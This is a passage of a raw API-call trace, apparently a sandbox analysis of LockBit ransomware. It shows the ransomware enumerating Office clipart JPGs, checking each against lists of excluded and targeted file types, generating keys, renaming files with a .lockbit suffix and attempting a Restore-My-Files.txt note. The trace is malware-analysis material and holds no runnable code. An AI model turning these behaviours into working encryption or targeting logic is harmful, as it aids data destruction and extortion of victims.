lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d41000, ftCreationTime.dwHighDateTime=0x1bf58da, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6d41000, ftLastWriteTime.dwHighDateTime=0x1bf58da, nFileSizeHigh=0x0, nFileSizeLow=0x42d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287642.JPG", cAlternateFileName="")) returned 1 [0154.642] lstrcmpiW (lpString1=".", lpString2="J0287642.JPG") returned -1 [0154.642] lstrcmpiW (lpString1="..", lpString2="J0287642.JPG") returned -1 [0154.642] PathFindExtensionW (pszPath="J0287642.JPG") returned=".JPG" [0154.642] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0154.642] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0154.642] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0154.642] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0154.643] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0154.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0154.644] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0154.644] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0154.645] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0154.645] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0154.645] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0154.645] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0154.645] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0154.645] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287642.JPG") returned 1 [0154.645] lstrcmpiW (lpString1="ntldr", lpString2="J0287642.JPG") returned 1 [0154.645] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287642.JPG") returned 1 [0154.645] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287642.JPG") returned -1 [0154.645] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287642.JPG") returned -1 [0154.645] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287642.JPG") returned 1 [0154.645] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287642.JPG") returned -1 [0154.645] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.645] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG") returned=".JPG" [0154.645] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0154.645] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0154.645] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0154.645] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0154.646] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0154.646] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0154.646] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0154.646] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0154.646] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0154.646] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0154.646] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0154.647] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0154.647] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0154.647] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0154.647] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0154.647] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0154.647] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0154.647] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG.lockbit") returned 72 [0154.647] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287642.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.648] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.648] malloc (_Size=0x40068) returned 0x3d70450 [0154.648] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=17105) returned 1 [0154.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0154.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0154.650] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.655] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.655] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.655] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.657] free (_Block=0x1fa2ed8) [0154.657] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.657] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.657] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.657] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5a2e300, ftCreationTime.dwHighDateTime=0x1bf58da, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5a2e300, ftLastWriteTime.dwHighDateTime=0x1bf58da, nFileSizeHigh=0x0, nFileSizeLow=0x3e91, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287643.JPG", cAlternateFileName="")) returned 1 [0154.657] lstrcmpiW (lpString1=".", lpString2="J0287643.JPG") returned -1 [0154.657] lstrcmpiW (lpString1="..", lpString2="J0287643.JPG") returned -1 [0154.657] PathFindExtensionW (pszPath="J0287643.JPG") returned=".JPG" [0154.657] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0154.657] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0154.658] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0154.658] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0154.659] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0154.659] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0154.660] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0154.660] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0154.660] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0154.660] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0154.660] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0154.660] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0154.660] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0154.660] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0154.660] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0154.660] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0154.660] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287643.JPG") returned 1 [0154.660] lstrcmpiW (lpString1="ntldr", lpString2="J0287643.JPG") returned 1 [0154.660] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287643.JPG") returned 1 [0154.660] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287643.JPG") returned -1 [0154.660] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287643.JPG") returned -1 [0154.660] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287643.JPG") returned 1 [0154.660] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287643.JPG") returned -1 [0154.661] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.661] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG") returned=".JPG" [0154.661] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0154.661] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0154.661] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0154.661] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0154.661] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0154.662] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0154.662] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG.lockbit") returned 72 [0154.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287643.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0154.663] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.663] malloc (_Size=0x40068) returned 0x3e70008 [0154.663] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=16017) returned 1 [0154.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0154.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.681] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0154.682] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0155.197] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.197] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.198] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.199] free (_Block=0x1fa2ed8) [0155.199] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.199] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.199] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5a2e300, ftCreationTime.dwHighDateTime=0x1bf58da, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5a2e300, ftLastWriteTime.dwHighDateTime=0x1bf58da, nFileSizeHigh=0x0, nFileSizeLow=0x43c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287644.JPG", cAlternateFileName="")) returned 1 [0155.199] lstrcmpiW (lpString1=".", lpString2="J0287644.JPG") returned -1 [0155.199] lstrcmpiW (lpString1="..", lpString2="J0287644.JPG") returned -1 [0155.199] PathFindExtensionW (pszPath="J0287644.JPG") returned=".JPG" [0155.199] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0155.199] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0155.199] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0155.200] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0155.200] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0155.201] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0155.201] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287644.JPG") returned 1 [0155.202] lstrcmpiW (lpString1="ntldr", lpString2="J0287644.JPG") returned 1 [0155.202] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287644.JPG") returned 1 [0155.202] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287644.JPG") returned -1 [0155.202] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287644.JPG") returned -1 [0155.202] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287644.JPG") returned 1 [0155.202] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287644.JPG") returned -1 [0155.202] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.202] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG") returned=".JPG" [0155.202] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0155.202] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0155.202] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0155.202] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0155.203] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0155.203] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0155.203] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0155.203] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0155.203] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0155.203] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW 